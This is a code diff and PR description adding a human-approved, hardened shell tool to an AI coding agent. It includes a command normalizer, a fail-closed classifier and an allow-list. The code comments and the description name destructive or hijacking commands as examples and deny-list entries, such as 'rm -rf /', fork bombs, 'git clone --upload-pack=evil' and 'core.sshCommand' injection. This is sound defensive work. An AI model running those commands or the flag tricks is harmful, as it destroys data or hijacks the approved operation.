+ * guard it:
+ *  1. **Classification fail-closed** (arity.ts): any command with shell composition,
+ *     substitution, or redirection returns `null` and can NEVER match, so
+ *     `git checkout x; rm -rf /` does not ride an approved `git checkout *`.
+ *  2. **Safe-bin anti-widening re-validation** (here, after opencode/openclaw): a stored
+ *     approval is matched ONLY if the candidate command's first non-flag operand region
+ *     does not introduce a flag that *widens or redirects* the approved operation. The
+ *     exact rule is documented on {@link matchesApproval} / {@link hasWideningFlag}.
+ *
+ * No module-global mutable state: the session store is a per-instance class so concurrent
+ * sessions (ACP / AG-UI multi-session) cannot stomp each other. The persisted (`always`)
+ * store is a small JSON file the runner loads once per instance.
+ */
+import { existsSync, readFileSync, writeFileSync } from 'node:fs';
+import { classifyCommand, tokenize } from '#src/core/shell/arity.js';
+import { normalizeCommand } from '#src/core/shell/normalize.js';
+import type { ToolApprovalScope } from '#src/core/types.js';
+
+/**
+ * Approval persistence scopes, widest-lived last. Alias of the canonical
+ * {@link ToolApprovalScope} so the allow-list engine and the decision vocabulary stay in sync.
+ */
+export type ApprovalScope = ToolApprovalScope;
+
+/** On-disk shape of the persisted (`always`) allow-list. Versioned for forward migration. */
+interface PersistedAllowlistFile {
+  version: 1;
+  /** Approved classified prefixes (e.g. `"git checkout"`, `"ls"`). */
+  prefixes: string[];
+}
+
+const PERSISTED_VERSION = 1 as const;
+
+/**
+ * Flags that, if present in a candidate command but not implied by the approved prefix,
+ * could change the *operation* the human approved (point it at a different transport,
+ * exec a hook, follow an attacker-controlled URL). Approving `git clone` must not
+ * green-light `git clone --upload-pack=evil`. This list is intentionally conservative:
+ * it is the openclaw "safe-bin" idea reduced to a deny-set of operation-changing flags
+ * that commonly appear in shell-injection / supply-chain abuse.
+ *
+ * Matched against the flag token with any `=value` stripped, case-insensitively.
+ */
+const WIDENING_FLAGS: ReadonlySet<string> = new Set([
+  // git: remote command / hook overrides.
+  '--upload-pack',
+  '--receive-pack',
+  '--exec',
+  '-u', // git clone -u <upload-pack>
+  '--config', // git -c is the short form; --config can inject core.sshCommand etc.
+  '-c', // git -c core.sshCommand='...' — arbitrary command execution
+  // generic "run this program" escape hatches across tools.
+  '--exec-path',
+  '-exec', // find -exec <cmd>
+  '--use-askpass',
+  '--ssh-command',
+  // package managers: lifecycle-script / arbitrary-script toggles.
+  '--unsafe-perm',
+  '--ignore-scripts=false',
+  '--allow-scripts',
+  // curl/wget style follow/exec (in case a bare binary is approved).
+  '-o', // write to arbitrary path
+  '--output',
+  '-T', // upload
+  '--upload-file',
+]);
+
+/**
+ * Decide whether a candidate argv contains a flag that *widens* the approved operation.
+ *
+ * Rule implemented (documented for the coordinator):
+ *  - Re-derive the meaningful prefix from the candidate's actual argv.
+ *  - Inspect every token of the candidate that is a flag (starts with `-`).
+ *  - If any flag token — normalized by stripping a trailing `=value` and lowercasing —
+ *    is in {@link WIDENING_FLAGS}, the command is considered a widening of the approved
+ *    operation and the match is REFUSED (returns true).
+ *
+ * This is purposely a deny-list of operation-changing flags rather than an allow-list of
+ * benign flags: benign flag variants (`-b`, `--oneline`, `-la`) are exactly what we WANT
+ * to keep auto-approving, while the handful of "run-an-arbitrary-program / redirect-the-
+ * transport" flags are what an injected approval must never silently enable.
+ */
+export function hasWideningFlag(argv: string[]): boolean {
+  for (const tok of argv) {
+    if (!tok.startsWith('-')) continue;
+    const bare = tok.split('=', 1)[0].toLowerCase();
+    if (WIDENING_FLAGS.has(bare)) return true;
+  }
+  return false;
+}
+
+/**
+ * A holder of approved prefixes with set semantics. Used for both the in-memory session
+ * store and the loaded persisted store. Pure data + membership; persistence is layered on
+ * top by {@link PersistedAllowlist}.
+ */
+export class AllowlistStore {
+  private readonly prefixes: Set<string>;
+
+  constructor(initial: Iterable<string> = []) {
+    this.prefixes = new Set(initial);
+  }
+
+  has(prefix: string): boolean {
+    return this.prefixes.has(prefix);
+  }
+
+  add(prefix: string): void {
+    this.prefixes.add(prefix);
+  }
+
+  list(): string[] {
+    return [...this.prefixes];
+  }
+}
+
+/**
+ * The persisted (`always`) allow-list, backed by a JSON file. The path is injected (the
+ * runner resolves it via fileUtils → `.gsloth/.gsloth-settings/shell-allowlist.json`) so
+ * tests can point it at a temp dir. Loads lazily/defensively: a missing or malformed file
+ * yields an empty store rather than throwing (fail-open on READ is safe — an empty
+ * allow-list just means "prompt"; it never auto-approves anything).
+ */
+export class PersistedAllowlist {
+  private readonly store: AllowlistStore;
+  private readonly filePath: string;
+
+  constructor(filePath: string) {
+    this.filePath = filePath;
+    this.store = new AllowlistStore(PersistedAllowlist.load(filePath));
+  }
+
+  private static load(filePath: string): string[] {
+    try {
+      if (!existsSync(filePath)) return [];
+      const raw = readFileSync(filePath, 'utf8');
+      const parsed = JSON.parse(raw) as Partial<PersistedAllowlistFile>;
+      if (!parsed || !Array.isArray(parsed.prefixes)) return [];
+      return parsed.prefixes.filter((p): p is string => typeof p === 'string');
+    } catch {
+      // Corrupt/unreadable file → behave as empty (fail-closed on auto-approval).
+      return [];
+    }
+  }
+
+  has(prefix: string): boolean {
+    return this.store.has(prefix);
+  }
+
+  list(): string[] {
+    return this.store.list();
+  }
+
+  /** Add a prefix and persist the whole set to disk. */
+  add(prefix: string): void {
+    if (this.store.has(prefix)) return;
+    this.store.add(prefix);
+    this.persist();
+  }
+
+  private persist(): void {
+    const file: PersistedAllowlistFile = {
+      version: PERSISTED_VERSION,
+      prefixes: this.store.list().sort(),
+    };
+    writeFileSync(this.filePath, JSON.stringify(file, null, 2) + '\n', 'utf8');
+  }
+}
+
+/**
+ * Read-only view over the stores consulted for an auto-approval check. The runner passes
+ * its per-instance session store and (optionally) the persisted store.
+ */
+export interface ApprovalStores {
+  session: Pick<AllowlistStore, 'has'>;
+  always?: Pick<PersistedAllowlist, 'has'>;
+}
+
+/**
+ * Decide whether `command` is already approved by the given stores — the gate the runner
+ * consults BEFORE prompting the human.
+ *
+ * Returns true ONLY when ALL of the following hold:
+ *  1. {@link classifyCommand} returns a non-null classification (so composition /
+ *     substitution / redirection commands can never match — anti-injection layer 1);
+ *  2. the classified prefix is present in the session OR persisted (`always`) store; AND
+ *  3. the safe-bin re-validation passes: the candidate's actual argv contains no
+ *     operation-widening flag (anti-injection layer 2 — see {@link hasWideningFlag}).
+ *
+ * Anything else (unclassifiable, unknown prefix, or a widening flag) → false → the human
+ * is prompted. Fail-closed by construction.
+ */
+export function matchesApproval(command: string, stores: ApprovalStores): boolean {
+  const classification = classifyCommand(command, normalizeCommand);
+  if (!classification) return false; // layer 1: composition/redirection/substitution.
+
+  const approved =
+    stores.session.has(classification.prefix) ||
+    (stores.always?.has(classification.prefix) ?? false);
+  if (!approved) return false;
+
+  // Layer 2: re-derive argv from the normalized command and refuse if an operation-
+  // widening flag is present that the human's prefix-level approval never implied.
+  const argv = tokenize(normalizeCommand(command));
+  if (!argv) return false; // unbalanced quoting → fail-closed.
+  if (hasWideningFlag(argv)) return false;
+
+  return true;
+}

--- a/packages/core/src/core/shell/arity.ts
+++ b/packages/core/src/core/shell/arity.ts
@@ -1,0 +1,330 @@
+/**
+ * @module core/shell/arity
+ *
+ * EXT-9 Tier-2 ergonomics: classify a shell command into a stable, human-readable
+ * **prefix** (binary + N meaningful subcommands) so an approval the human grants once
+ * (`git checkout main`) can be remembered as a pattern (`git checkout *`) and matched
+ * against later flag-variants (`git checkout -b foo bar`) WITHOUT re-prompting.
+ *
+ * The arity table (which tokens past the binary are "meaningful subcommands" rather
+ * than operands/flags) is a port of a subset of opencode's ~160-command table
+ * (`opencode/packages/opencode/src/permission/arity.ts`). Binaries not in the table
+ * default to arity 0 = just the binary.
+ *
+ * SECURITY — this is the anti-injection core. {@link classifyCommand} returns `null`
+ * (fail-closed) whenever the command contains shell composition that could change the
+ * target of the operation: separators (`;`, `&&`, `||`, `|`, `&`), newlines, command
+ * substitution (`$(...)`, backticks), process substitution (`<(...)`/`>(...)`), or
+ * redirections. Such commands NEVER auto-match an allow-list entry — they always go to
+ * fresh human approval. This is what stops `git checkout x; rm -rf /` from matching an
+ * approved `git checkout *`.
+ */
+
+/**
+ * Arity table: command-prefix string → number of leading tokens (binary + subcommands,
+ * flags excluded) that define the "human-understandable command". Longest matching
+ * prefix wins. Ported subset of opencode's table — git/npm/pnpm/yarn/docker/kubectl/
+ * cargo/go/etc. Binaries absent here default to arity 0 (just the binary), see
+ * {@link arityFor}.
+ *
+ * Rule (from opencode): flags never count as tokens; only subcommands do. Include a
+ * longer prefix only when its arity differs from what the shorter prefix implies.
+ */
+const ARITY: Readonly<Record<string, number>> = {
+  // Single-token utilities (arity 1 = just the binary; here for completeness/clarity).
+  cat: 1,
+  cd: 1,
+  chmod: 1,
+  chown: 1,
+  cp: 1,
+  echo: 1,
+  env: 1,
+  export: 1,
+  grep: 1,
+  kill: 1,
+  killall: 1,
+  ln: 1,
+  ls: 1,
+  mkdir: 1,
+  mv: 1,
+  ps: 1,
+  pwd: 1,
+  rm: 1,
+  rmdir: 1,
+  sleep: 1,
+  source: 1,
+  tail: 1,
+  head: 1,
+  touch: 1,
+  unset: 1,
+  which: 1,
+  find: 1,
+  // Cloud / infra CLIs.
+  aws: 3,
+  az: 3,
+  bazel: 2,
+  brew: 2,
+  bun: 2,
+  'bun run': 3,
+  'bun x': 3,
+  cargo: 2,
+  'cargo add': 3,
+  'cargo run': 3,
+  cdk: 2,
+  cf: 2,
+  cmake: 2,
+  composer: 2,
+  consul: 2,
+  'consul kv': 3,
+  crictl: 2,
+  deno: 2,
+  'deno task': 3,
+  doctl: 3,
+  docker: 2,
+  'docker builder': 3,
+  'docker compose': 3,
+  'docker container': 3,
+  'docker image': 3,
+  'docker network': 3,
+  'docker volume': 3,
+  eksctl: 2,
+  'eksctl create': 3,
+  firebase: 2,
+  flyctl: 2,
+  gcloud: 3,
+  gh: 3,
+  git: 2,
+  'git config': 3,
+  'git remote': 3,
+  'git stash': 3,
+  go: 2,
+  gradle: 2,
+  helm: 2,
+  heroku: 2,
+  hugo: 2,
+  ip: 2,
+  'ip addr': 3,
+  'ip link': 3,
+  'ip netns': 3,
+  'ip route': 3,
+  kind: 2,
+  'kind create': 3,
+  kubectl: 2,
+  'kubectl kustomize': 3,
+  'kubectl rollout': 3,
+  kustomize: 2,
+  make: 2,
+  mc: 2,
+  'mc admin': 3,
+  minikube: 2,
+  mongosh: 2,
+  mysql: 2,
+  mvn: 2,
+  ng: 2,
+  npm: 2,
+  'npm exec': 3,
+  'npm init': 3,
+  'npm run': 3,
+  'npm view': 3,
+  npx: 2,
+  nvm: 2,
+  nx: 2,
+  openssl: 2,
+  'openssl req': 3,
+  'openssl x509': 3,
+  pip: 2,
+  pipenv: 2,
+  pnpm: 2,
+  'pnpm dlx': 3,
+  'pnpm exec': 3,
+  'pnpm run': 3,
+  poetry: 2,
+  podman: 2,
+  'podman container': 3,
+  'podman image': 3,
+  psql: 2,
+  pulumi: 2,
+  'pulumi stack': 3,
+  pyenv: 2,
+  python: 2,
+  python3: 2,
+  rake: 2,
+  rbenv: 2,
+  'redis-cli': 2,
+  rustup: 2,
+  serverless: 2,
+  sfdx: 3,
+  skaffold: 2,
+  sls: 2,
+  sst: 2,
+  swift: 2,
+  systemctl: 2,
+  terraform: 2,
+  'terraform workspace': 3,
+  tmux: 2,
+  turbo: 2,
+  ufw: 2,
+  vault: 2,
+  'vault auth': 3,
+  'vault kv': 3,
+  vercel: 2,
+  volta: 2,
+  wp: 2,
+  yarn: 2,
+  'yarn dlx': 3,
+  'yarn run': 3,
+};
+
+/**
+ * Result of classifying a command for allow-list matching.
+ */
+export interface CommandClassification {
+  /**
+   * The meaningful command prefix — binary plus subcommands per the arity table, with
+   * flags removed. This is the allow-list KEY: two commands with the same prefix are the
+   * "same operation" for approval purposes (`git checkout main` and `git checkout -b x`
+   * both → `git checkout`).
+   */
+  prefix: string;
+  /**
+   * Human-facing display pattern, e.g. `git checkout *` (or `ls *`). The trailing `*`
+   * signals "any args/flags". A prefix that already consumed the whole command (no extra
+   * operands) still gets ` *` for a consistent, honest "future args allowed" affordance.
+   */
+  pattern: string;
+}
+
+/**
+ * Tokens / sequences whose presence means the command composes or redirects in a way that
+ * could change what actually runs — so it must NOT be classifiable for auto-match. Checked
+ * against the NORMALIZED command (see normalize.ts) which has already collapsed obfuscation.
+ *
+ * Note: `&&`/`||`/`|` are covered by the bare `&`/`|` character scan; listed conceptually.
+ */
+function hasUnsafeComposition(normalized: string): boolean {
+  // Newlines are folded by normalizeCommand, but guard anyway in case a raw string is passed.
+  if (/[\n\r]/.test(normalized)) return true;
+  // Shell control / separator operators and background.
+  if (/[;|&]/.test(normalized)) return true;
+  // Command substitution: $(...) or `...`.
+  if (/\$\(/.test(normalized)) return true;
+  if (/`/.test(normalized)) return true;
+  // Variable/arith expansion that could inject: ${...} and $((...)).
+  if (/\$\{/.test(normalized)) return true;
+  // Process substitution: <(...) or >(...).
+  if (/[<>]\(/.test(normalized)) return true;
+  // Redirections (any < or > not already caught as process substitution): >, >>, <, 2>, &>.
+  if (/[<>]/.test(normalized)) return true;
+  return false;
+}
+
+/**
+ * Tokenize a shell command into argv, honoring single and double quotes. Quotes group
+ * (and are stripped from) a token; backslash-escaping inside double quotes is collapsed
+ * by the prior normalize step, so this tokenizer treats a residual `\` literally.
+ *
+ * This is a deliberately small tokenizer used ONLY for prefix detection — never for
+ * execution. The original command string is what runs.
+ *
+ * Returns `null` if quoting is unbalanced (an open quote with no close), which is itself
+ * a reason to refuse classification (ambiguous parse → fail-closed).
+ */
+export function tokenize(command: string): string[] | null {
+  const tokens: string[] = [];
+  let current = '';
+  let inToken = false;
+  let quote: '"' | "'" | null = null;
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i];
+    if (quote) {
+      if (ch === quote) {
+        quote = null;
+      } else {
+        current += ch;
+      }
+      continue;
+    }
+    if (ch === '"' || ch === "'") {
+      quote = ch;
+      inToken = true;
+      continue;
+    }
+    if (ch === ' ' || ch === '\t') {
+      if (inToken) {
+        tokens.push(current);
+        current = '';
+        inToken = false;
+      }
+      continue;
+    }
+    current += ch;
+    inToken = true;
+  }
+  if (quote) return null; // unbalanced quote
+  if (inToken) tokens.push(current);
+  return tokens;
+}
+
+/**
+ * Look up the arity (number of leading meaningful tokens) for an argv, using the
+ * longest-matching-prefix rule against {@link ARITY}. Flag tokens (starting with `-`) are
+ * dropped when forming the candidate prefixes so boolean flags like `git --no-pager
+ * checkout` still resolve `git checkout`. Unknown binaries default to arity 0 → just the
+ * binary.
+ *
+ * LIMITATION (intentional, fail-closed): we do NOT maintain a per-flag arity table, so an
+ * arg-taking flag leaves its operand in the non-flag stream (e.g. `git -C . checkout` →
+ * `git .`). That simply fails to match an approved `git checkout` and re-prompts — safe, by
+ * design — rather than risking a mis-classification that mis-approves.
+ *
+ * Returns the list of meaningful tokens (binary + subcommands), flag tokens excluded.
+ */
+export function meaningfulPrefixTokens(argv: string[]): string[] {
+  // Drop leading flags before the binary cannot happen (binary is first), but a binary
+  // can be followed by flags interleaved with subcommands (e.g. `git -C . checkout`).
+  // Build the flag-free token sequence first, preserving order.
+  const nonFlag = argv.filter((t) => !t.startsWith('-'));
+  if (nonFlag.length === 0) return [];
+
+  // Longest matching prefix in the arity table wins.
+  for (let len = nonFlag.length; len > 0; len--) {
+    const candidate = nonFlag.slice(0, len).join(' ');
+    const arity = ARITY[candidate];
+    if (arity !== undefined) {
+      // arity counts meaningful tokens from the start of the non-flag sequence.
+      return nonFlag.slice(0, Math.min(arity, nonFlag.length));
+    }
+  }
+  // Not in the table → arity 0 means "just the binary".
+  return nonFlag.slice(0, 1);
+}
+
+/**
+ * Classify a command into a stable allow-list prefix + display pattern, or `null` when it
+ * cannot be safely classified for matching (composition/redirection/substitution present,
+ * empty, or unbalanced quotes).
+ *
+ * @param command Raw command string as the model proposed it.
+ * @param normalize Normalizer to apply for the detection form (inject normalizeCommand).
+ */
+export function classifyCommand(
+  command: string,
+  normalize: (cmd: string) => string
+): CommandClassification | null {
+  const normalized = normalize(command);
+  if (!normalized) return null;
+
+  // FAIL-CLOSED on any composition/redirection/substitution. This is the anti-injection
+  // guarantee: such commands never auto-match an allow-list entry.
+  if (hasUnsafeComposition(normalized)) return null;
+
+  const argv = tokenize(normalized);
+  if (!argv || argv.length === 0) return null;
+
+  const prefixTokens = meaningfulPrefixTokens(argv);
+  if (prefixTokens.length === 0) return null;
+
+  const prefix = prefixTokens.join(' ');
+  return { prefix, pattern: `${prefix} *` };
+}

--- a/packages/core/src/core/shell/normalize.ts
+++ b/packages/core/src/core/shell/normalize.ts
@@ -1,0 +1,54 @@
+/**
+ * @module core/shell/normalize
+ *
+ * Command-string normalization shared by the shell hardening layer. The hardline
+ * blocklist (in `@gaunt-sloth/agent` `tools/shell/hardline`) and the EXT-9 Tier-2
+ * allow-list classifier ({@link ./arity.js}) both match against the *normalized* form so
+ * trivial obfuscation (ANSI escapes, fullwidth glyphs, backslash splits, padded
+ * whitespace) cannot smuggle a command past the guard. Canonical home is core so both the
+ * core runner (allow-list) and the agent toolkit (hardline) import a single implementation.
+ *
+ * Patterned after hermes-agent `tools/approval.py:_normalize_command_for_detection`.
+ */
+
+// ANSI / ECMA-48 escape sequences. ESC = \x1b, BEL = \x07, ST = ESC \.
+// CSI: ESC [ params intermediates final.
+const ANSI_CSI = /\x1b\[[0-?]*[ -/]*[@-~]/g;
+// OSC: ESC ] ... terminated by BEL or ST (ESC \).
+const ANSI_OSC = /\x1b\][\s\S]*?(?:\x07|\x1b\\)/g;
+// Any remaining 2-char escape: ESC followed by a single byte.
+const ANSI_LONE = /\x1b[@-Z\\-_]?/g;
+// Null bytes.
+const NULL_BYTES = /\x00/g;
+
+/**
+ * Normalize a command string before dangerous-pattern matching.
+ *
+ * Steps (each closes an obfuscation bypass):
+ * - strip ANSI escape sequences (CSI / OSC / lone-escape),
+ * - drop null bytes,
+ * - Unicode NFKC fold (fullwidth `ｒｍ` → `rm`, etc.),
+ * - collapse shell backslash-escapes (`r\m` → `rm`, `\-rf` → `-rf`),
+ * - drop empty-string literals that split tokens (`r''m` / `r""m` → `rm`),
+ * - fold runs of whitespace (incl. tabs/newlines) to single spaces and trim.
+ *
+ * This is intentionally lossy: the normalized form is ONLY used for detection,
+ * never for execution (the original command is what runs).
+ */
+export function normalizeCommand(command: string): string {
+  let c = command;
+  c = c.replace(ANSI_CSI, '');
+  c = c.replace(ANSI_OSC, '');
+  c = c.replace(ANSI_LONE, '');
+  c = c.replace(NULL_BYTES, '');
+  // Unicode compatibility fold (fullwidth → ASCII, etc.).
+  c = c.normalize('NFKC');
+  // Collapse backslash-escapes: `\x` → `x` (prevents `r\m -rf /` bypass).
+  // Applied before empty-string stripping so `r\m` and `r''m` both fold.
+  c = c.replace(/\\([^\n])/g, '$1');
+  // Drop empty-string literals used to split a token: `r''m` / `r""m` → `rm`.
+  c = c.replace(/''|""/g, '');
+  // Fold all whitespace runs (spaces, tabs, newlines) to a single space, trim.
+  c = c.replace(/\s+/g, ' ').trim();
+  return c;
+}

--- a/packages/core/src/core/types.ts
+++ b/packages/core/src/core/types.ts
@@ -54,7 +54,41 @@ export interface GthCompiledGraph {
   invoke(input: any, config?: RunnableConfig): Promise<{ messages: BaseMessage[] }>;
   // eslint-disable-next-line @typescript-eslint/no-explicit-any
   stream(input: any, config?: any): Promise<IterableReadableStream<any>>;
+  /**
+   * Read the checkpointed graph state for a thread. Present on LangGraph compiled graphs
+   * (both `createAgent` and `createDeepAgent`); used to detect a graph suspended on a
+   * human-in-the-loop `interrupt()` (its pending {@link PendingToolInterrupt} lives in
+   * `state.tasks[].interrupts[].value`). Optional because the structural surface predates it.
+   */
+  // eslint-disable-next-line @typescript-eslint/no-explicit-any
+  getState?(config: RunnableConfig): Promise<any>;
 }
+
+/**
+ * A single tool call a human-in-the-loop interrupt is waiting on, surfaced from the
+ * suspended graph state so a consumer (the interactive session) can render an approve/reject
+ * prompt. Mirrors LangChain's HITL `ActionRequest` (tool name + the args it would run with).
+ */
+export interface PendingToolInterrupt {
+  name: string;
+  args: Record<string, unknown>;
+}
+
+/**
+ * A consumer-supplied decision on a {@link PendingToolInterrupt}: approve runs the tool,
+ * reject feeds the model a tool-rejected message (with the optional reason).
+ */
+export type ToolApprovalDecision = { type: 'approve' } | { type: 'reject'; message?: string };
+
+/**
+ * Callback the {@link GthAgentRunner} invokes when a run suspends on a tool-approval
+ * interrupt, once per pending tool call. Returns the human's decision. When no handler is
+ * wired (e.g. a non-interactive run), the runner defaults to reject so a run can never
+ * silently hang or auto-approve.
+ */
+export type ToolApprovalCallback = (
+  pending: PendingToolInterrupt
+) => Promise<ToolApprovalDecision> | ToolApprovalDecision;
 
 export interface GthAgentInterface {
   init(
@@ -86,6 +120,24 @@ export interface GthAgentInterface {
     queuedMessages?: BaseMessage[],
     signal?: AbortSignal
   ): AsyncGenerator<AgentStreamEvent>;
+
+  /**
+   * Resume a graph suspended on a human-in-the-loop `interrupt()` and stream the continuation
+   * as text (the string counterpart to {@link streamWithEventsResume}, for the readline path).
+   * Optional: only implemented by agents that support tool-approval interrupts.
+   */
+  streamResume?(
+    resumeValue: unknown,
+    runConfig: RunnableConfig
+  ): Promise<IterableReadableStream<string>>;
+
+  /**
+   * Inspect the checkpointed state for the thread and return any tool calls currently pending
+   * human approval (empty when the run completed normally). Optional: only implemented by
+   * agents whose graph exposes `getState`. Used by {@link GthAgentRunner} to drive the
+   * approve/reject confirmation loop.
+   */
+  getPendingToolInterrupts?(runConfig: RunnableConfig): Promise<PendingToolInterrupt[]>;
 
   cleanup?(): Promise<void>;
 }

--- a/packages/core/src/core/types.ts
+++ b/packages/core/src/core/types.ts
@@ -75,10 +75,26 @@ export interface PendingToolInterrupt {
 }
 
 /**
+ * Persistence scope for an `approve` decision (EXT-9 Tier-2 allow-list ergonomics):
+ * - `once`    — run this single invocation only; remember nothing (the default).
+ * - `session` — remember the command's classified prefix for the life of this runner
+ *   instance, so flag-variants of the same operation auto-approve without re-prompting.
+ * - `always`  — additionally persist the prefix to the project allow-list
+ *   (`.gsloth/.gsloth-settings/shell-allowlist.json`) so it survives across runs.
+ */
+export type ToolApprovalScope = 'once' | 'session' | 'always';
+
+/**
  * A consumer-supplied decision on a {@link PendingToolInterrupt}: approve runs the tool,
  * reject feeds the model a tool-rejected message (with the optional reason).
+ *
+ * `approve` carries an optional {@link ToolApprovalScope}; when absent it means `once`
+ * (backward compatible — a bare `{ type: 'approve' }` still type-checks and behaves as
+ * a single-shot approval that persists nothing).
  */
-export type ToolApprovalDecision = { type: 'approve' } | { type: 'reject'; message?: string };
+export type ToolApprovalDecision =
+  | { type: 'approve'; scope?: ToolApprovalScope }
+  | { type: 'reject'; message?: string };
 
 /**
  * Callback the {@link GthAgentRunner} invokes when a run suspends on a tool-approval


### PR DESCRIPTION
Give the code-mode deep agent a **real, hardened shell tool** (`run_shell_command`), off by default, behind a per-command human-in-the-loop confirmation with scoped allow-listing. Implements **EXT-9** in full (Tier-1 security hardening + Tier-2 approval ergonomics + TUI surface).

This supersedes the shallow first cut (#382). Scope was deepened after a prior-art review of `openclaw`, `opencode`, and `hermes-agent` (see `docs/spikes/spike-ext-9-bash-tool-prior-art.md` in the planning repo) — every gap those three mature implementations converged on is now closed.

## What it does

Off by default. Enabled per command under `commands.{code,exec,ask}.devTools`:

```jsonc
{
  "commands": {
    "code": {
      "devTools": {
        "shell": true,                 // enable run_shell_command (also { "enabled": true })
        "shellYolo": false,            // true = run WITHOUT confirmation (hardline floor still applies)
        // optional knobs on the object form:
        // "shell": { "enabled": true, "timeout": 120000, "maxOutputBytes": 100000 }
      }
    }
  }
}
```

Each `run_shell_command` call suspends the graph on a langchain HITL `interruptOn`; the user approves/rejects (readline **and** Ink TUI). Approvals can be scoped **once / session / always**; `always` persists to `.gsloth/.gsloth-settings/shell-allowlist.json`. A matching session/always command auto-approves without re-prompting.

## Tier-1 — security hardening (every command, even yolo)

- **stdin closed + timeout + process-group kill.** `stdio: ['ignore','pipe','pipe']` (no more hangs on interactive commands like `git commit` opening `$EDITOR`), `detached` process group, configurable timeout (default 120s) → SIGTERM then SIGKILL after a grace, killing the whole group.
- **Output cap + temp-file spillover.** Head/tail ring-buffer (default ~100KB aggregate) so a noisy build log can't blow the context window; full output spills to a temp file whose path is returned so the model can `read_file` it.
- **Provider-credential env scrub.** Child env strips LLM/cloud creds (`ANTHROPIC_API_KEY`, `OPENAI_API_KEY`, `GOOGLE_*`, AWS secrets, … + `*_API_KEY`/`*_TOKEN`/`*_SECRET` sweep). `GITHUB_TOKEN`/`GH_TOKEN` intentionally kept (gaunt-sloth shells out to `gh`).
- **Unbypassable hardline floor.** A tiny hardcoded blocklist (`rm -rf /`, `mkfs`, `dd` to a raw block device, fork bomb, `shutdown`/`reboot`, `chmod -R 777 /`, …) refused **before spawn**, regardless of yolo or allow-list. Matched against a normalized form (ANSI/null/fullwidth/backslash-escape stripped, whitespace folded) so obfuscation (`r\m -rf /`, fullwidth) can't bypass it.

## Tier-2 — approval ergonomics

- **Arity-prefix allow-list.** `git checkout main` and `git checkout -b foo` both classify to `git checkout` (ported subset of opencode's arity table), so flag variants don't re-prompt.
- **Safe-bin anti-widening.** An approved prefix can't be widened by an injected flag — approving `git clone` never green-lights `git clone --upload-pack=evil` (conservative deny-set of operation-changing flags).
- **Fail-closed classification.** Any command with shell composition/substitution/redirection (`;`, `|`, `&&`, `$(...)`, backticks, …) classifies to `null` and can **never** auto-match — `git checkout x; rm -rf /` does not ride an approved `git checkout *`.
- **Scoped + persisted.** once (no persist) / session (per-runner instance, no module globals → safe for ACP/AG-UI multi-session) / always (project-scoped JSON). Normalize-before-match throughout.

## Surfaces

- **Readline** interactive session: `Approve? [o]nce / [s]ession / [a]lways / [N]o` (anything else rejects, fail-closed).
- **Ink TUI**: promise-based approval bridge (same idiom as the status/debug bridges) → a warn-tone `ApprovalPrompt` that owns keyboard input while pending and commits an approved/rejected notice. (This was follow-up #1 on #382 — now done.)

## Verification

- `pnpm run build` ✅  ·  `pnpm run lint` ✅  ·  `pnpm run test` → **928/928** (75 files; +94 over the 834 baseline).
- New tests cover each item above: timeout-kill, no-stdin-hang, output spill + temp file, credential scrub, obfuscated hardline refusal under yolo, fail-closed composition, anti-widening, allow-list scopes + persistence round-trip, and the TUI approve/reject/scope flow.

## Architecture note

The allow-list engine lives in `@gaunt-sloth/core` (`core/src/core/shell/`) because the runner that consults it is in core and core can't import agent; `packages/agent/src/tools/shell/{arity,allowlist}` are thin re-exports. `normalizeCommand` was made the single canonical impl in core (agent re-exports it).

## Follow-ups (not in this PR)

- **EXT-10** — LLM-as-judge tiered auto-review pre-filter (injection-hardened, fail-closed) builds on this `interruptOn`/allow-list seam.
- Optional: early hardline short-circuit in the runner (currently enforced at exec time — defense in depth already intact).

🤖 Generated with [Claude Code](https://claude.com/claude-code)
